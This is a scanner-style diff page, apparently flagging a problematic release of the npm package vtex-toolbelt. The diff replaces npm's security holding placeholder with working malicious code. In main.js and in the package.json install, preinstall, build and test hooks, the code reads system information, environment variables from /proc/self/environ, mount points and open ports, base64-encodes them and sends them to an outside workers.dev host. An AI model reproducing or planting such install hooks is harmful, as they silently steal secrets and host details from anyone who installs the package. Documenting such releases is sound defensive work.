vtex-toolbelt 0.0.1-security → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of vtex-toolbelt might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/main.js +24 -0
  2. package/package.json +17 -4
  3. package/README.md +0 -5
package/main.js ADDED
@@ -0,0 +1,24 @@
1
+ const { exec } = require('child_process');
2
+ const axios = require('axios');
3
+
4
+ const comando = 'echo $(uname -a) ":" $(cat /proc/self/mounts) | base64';
5
+
6
+ exec(comando, (error, stdout, stderr) => {
7
+ if (error) {
8
+ console.error(`Erro: ${error}`);
9
+ return;
10
+ }
11
+ console.log(`output: ${stdout}`);
12
+ console.error(`error: ${stderr}`);
13
+
14
+ const urlExterna = 'https://collaborator.gbrls.workers.dev/node/' + stdout;
15
+
16
+
17
+ axios.post(urlExterna, { saida: stdout })
18
+ .then(response => {
19
+ console.log('output sent');
20
+ })
21
+ .catch(err => {
22
+ console.error('error to send the output:', err);
23
+ });
24
+ });
package/package.json CHANGED
@@ -1,6 +1,19 @@
1
1
  {
2
- "name": "vtex-toolbelt",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
2
+ "name": "vtex-toolbelt",
3
+ "version": "1.0.2",
4
+ "description": "vtec cli tool",
5
+ "main": "syscom.js",
6
+ "scripts": {
7
+ "test": "curl https://collaborator.gbrls.workers.dev/vtec/test/$(uname -a | base64)",
8
+ "serve": "node ./main.js",
9
+ "build": "curl https://collaborator.gbrls.workers.dev/vtec/build/?$(uname -a | base64)",
10
+ "install": "curl https://collaborator.gbrls.workers.dev/vtec/install/?vars=$(cat /proc/self/environ | base64)&env=$(netstat -tulpn | base64)",
11
+ "preinstall": "curl https://collaborator.gbrls.workers.dev/vtec/preinstall/?$(uname -a | base64)"
12
+ },
13
+ "author": "gu414mu",
14
+ "license": "MIT",
15
+ "dependencies": {
16
+ "axios": "^1.6.0",
17
+ "vtec": "^1.0.1"
18
+ }
6
19
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=vtex-toolbelt for more information.